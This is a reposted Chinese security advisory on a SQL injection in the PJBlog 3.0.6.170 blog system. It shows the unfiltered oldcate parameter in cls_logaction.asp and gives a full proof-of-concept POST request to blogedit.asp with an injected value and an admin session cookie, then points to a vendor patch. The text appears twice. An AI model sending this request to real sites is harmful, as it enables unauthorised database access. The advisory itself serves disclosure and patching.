PJBlog个人博客系统cls_logAction.asp文件存在注入漏洞
程序员文章站
2022-03-12 17:34:20
影响版本:PJBlog 3.0.6.170
程序介绍:
PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术。
漏洞... 09-05-24...
影响版本:pjblog 3.0.6.170
程序介绍:
pjblog一套开源免费的中文个人博客系统程序,采用asp+access的技术,具有相当高的运作效能以及更新率,也支持目前blog所使用的新技术。
漏洞分析:
在文件class/cls_logaction.asp中:
oldcate=request.form("oldcate") //第429行
oldctype=request.form("oldtype")
d = conn.execute("select cate_part from blog_category where cate_id="&oldcate)(0)程序没有对变量oldcate做任何过滤放入sql查询语句中,导致注入漏洞的产生。
漏洞利用:
post /blogedit.asp http/1.1
accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
referer:
accept-language: zh-cn
content-type: application/x-www-form-urlencoded
ua-cpu: x86
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; tencenttraveler 4.0; .net clr 2.0.50727)
host: 127.0.0.1
content-length: 513
connection: keep-alive
cache-control: no-cache
cookie: __utma=96992031.4542583209449947600.1239335726.1240296350.1240324232.7; __utmz=96992031.1239335726.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pjblog3setting=viewtype=normal; pjblog3=memright=111111111111&memhashkey=c80f369e20b317566f736dbc70839834745d9c20&memname=
admin&exp=2010%2d4%2d21; aspsessionidccdsdaba=oebbhcodjfkijegkgcphgmcp
id=1&log_edittype=1&action=post&log_isdraft=false&title=xxx&log_cateid=3&cname=xxx&ctype=0&oldcname=
xxx&oldtype=0&oldcate=3201=1&log_weather=sunny&log_level=level3&log_comorder=1&blog_pws=
0&log_readpw=&log_pwtips=&c_pws=0&blog_meta=0&evio_keywords=xxx&evio_description=
web+safe&log_from=%e6%9c%ac%e7%ab%99%e5%8e%9f%e5%88%9b&log_fromurl=http%3a%2f%2flocalhost%2fbackci%2f&pubtimetype=com&pubtime=2009-4-21+15%3a54%3a46&tags=&ubbfonts=&ubbfonts=&ubbfonts=&ubbmethod=on&message=web+safe&log_intro=
web+safe&log_quote=解决方案:
厂商补丁:
pjblog
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
程序介绍:
pjblog一套开源免费的中文个人博客系统程序,采用asp+access的技术,具有相当高的运作效能以及更新率,也支持目前blog所使用的新技术。
漏洞分析:
在文件class/cls_logaction.asp中:
oldcate=request.form("oldcate") //第429行
oldctype=request.form("oldtype")
d = conn.execute("select cate_part from blog_category where cate_id="&oldcate)(0)程序没有对变量oldcate做任何过滤放入sql查询语句中,导致注入漏洞的产生。
漏洞利用:
post /blogedit.asp http/1.1
accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
referer:
accept-language: zh-cn
content-type: application/x-www-form-urlencoded
ua-cpu: x86
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; tencenttraveler 4.0; .net clr 2.0.50727)
host: 127.0.0.1
content-length: 513
connection: keep-alive
cache-control: no-cache
cookie: __utma=96992031.4542583209449947600.1239335726.1240296350.1240324232.7; __utmz=96992031.1239335726.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pjblog3setting=viewtype=normal; pjblog3=memright=111111111111&memhashkey=c80f369e20b317566f736dbc70839834745d9c20&memname=
admin&exp=2010%2d4%2d21; aspsessionidccdsdaba=oebbhcodjfkijegkgcphgmcp
id=1&log_edittype=1&action=post&log_isdraft=false&title=xxx&log_cateid=3&cname=xxx&ctype=0&oldcname=
xxx&oldtype=0&oldcate=3201=1&log_weather=sunny&log_level=level3&log_comorder=1&blog_pws=
0&log_readpw=&log_pwtips=&c_pws=0&blog_meta=0&evio_keywords=xxx&evio_description=
web+safe&log_from=%e6%9c%ac%e7%ab%99%e5%8e%9f%e5%88%9b&log_fromurl=http%3a%2f%2flocalhost%2fbackci%2f&pubtimetype=com&pubtime=2009-4-21+15%3a54%3a46&tags=&ubbfonts=&ubbfonts=&ubbfonts=&ubbmethod=on&message=web+safe&log_intro=
web+safe&log_quote=解决方案:
厂商补丁:
pjblog
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: